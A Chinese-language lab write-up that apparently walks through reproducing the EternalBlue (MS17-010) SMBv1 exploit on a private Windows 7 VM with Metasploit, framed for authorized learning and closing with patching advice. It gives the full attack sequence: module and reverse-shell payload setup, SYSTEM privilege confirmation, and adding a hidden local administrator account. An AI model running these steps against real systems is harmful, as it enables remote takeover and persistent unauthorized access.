本文仅用于本地靶机安全学习,所有操作在私有虚拟机环境完成,严禁对未授权设备实施攻击,坚守网络安全底线,做守法公民!

一、漏洞原理与环境准备

1. 漏洞核心原理

永恒之蓝利用Windows SMBv1协议处理Trans2请求时的内核驱动(srv.sys)漏洞,通过构造恶意数据包触发缓冲区溢出,劫持程序执行流,直接在内核态执行恶意代码,获取系统最高权限。该漏洞对应CVE-2017-0144,影响Windows 7、Server 2008等未打补丁的老旧系统,2017年WannaCry勒索病毒正是基于此漏洞全球传播。

2. 实验环境(仅本地靶机

攻击机:Kali Linux(需联⽹配置,安装 Metasploit 框架)

• 靶机:Windows 7 旗舰版(未安装MS17-010补丁,开放445端口,关闭防火墙)

• 网络:VMware仅主机模式,确保攻击机与靶机互通

二、实战复现:漏洞利用→权限获取→创建管理员用户

步骤1:启动Metasploit控制台

打开Kali2025终端,输入sudo su 提高权限,输入命令启动msfconsole框架:
msfconsole
步骤2:搜索并加载MS17-010利用模块

搜索永恒之蓝专用模块,选择攻击模块:
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
步骤3:配置模块参数

查看需配置的参数,设置靶机IP(RHOSTS)与攻击机监听IP(LHOST):
show options
set rhosts 192.168.xx.xx  # 替换为你的Win7靶机IP
set lhost 192.168.xx.xx   # 替换为你的Kali攻击机IP
set payload windows/x64/meterpreter/reverse_tcp
步骤4:执行攻击,获取Meterpreter会话

输入exploit或run发起攻击,成功后自动建立会话,获取靶机控制权限:
exploit
出现Meterpreter session 1 opened提示,说明攻击成功,已进入靶机控制终端。

步骤5:提权至System权限

永恒之蓝默认可直接获取系统权限,执行命令确认:
getsystem
getuid
返回NT AUTHORITY\SYSTEM,证明已拥有最高管理权限。

步骤6:进入系统Shell,创建标准用户

执行shell进入Windows命令行,先解决中文乱码:
shell
chcp 65001
创建标准用户(用户名:gogo,密码:123456):
net user gogo 123456 /add
步骤7:将用户添加至管理员组

将新建用户加入本地管理员组,获取完整管理权限:
net localgroup administrators gogo /add
验证用户权限:
net localgroup administrators
可看到gogo已在管理员组列表中,权限添加成功。

步骤8:退出会话,完成实验
exit  # 退出Windows Shell
exit  # 退出Meterpreter会话

三、总结升华

1. 漏洞危害:MS17-010是典型的无交互远程代码执行漏洞,内核级溢出直接获取System权限,可实现主机完全控制,是内网渗透、蠕虫传播的核心漏洞,足以体现老旧协议与未补丁系统的安全风险。

2. 学习价值:通过复现该漏洞,能掌握Metasploit模块使用、Meterpreter权限控制、Windows用户权限管理等基础渗透技能,理解漏洞利用→权限获取→权限维持的完整攻击链。

3. 防御关键:及时安装系统补丁、关闭445端口、禁用SMBv1协议、启用防火墙,是抵御此类漏洞攻击的核心手段。

四、重要备注

1. 本文所有操作仅在自建私有靶机环境完成,未对任何外部设备、生产环境发起攻击;

2. 未经授权入侵他人计算机系统属于违法行为,违反《网络安全法》《刑法》相关规定,需承担法律责任;

3. 网络安全学习应坚守合法、合规、授权原则,仅用于自身技术提升与安全防御研究。

坚守安全底线,弘扬白帽精神,做知法守法的网络安全从业者!

Logo

腾讯云面向开发者汇聚海量精品云计算使用和开发经验,营造开放的云计算技术生态圈。

更多推荐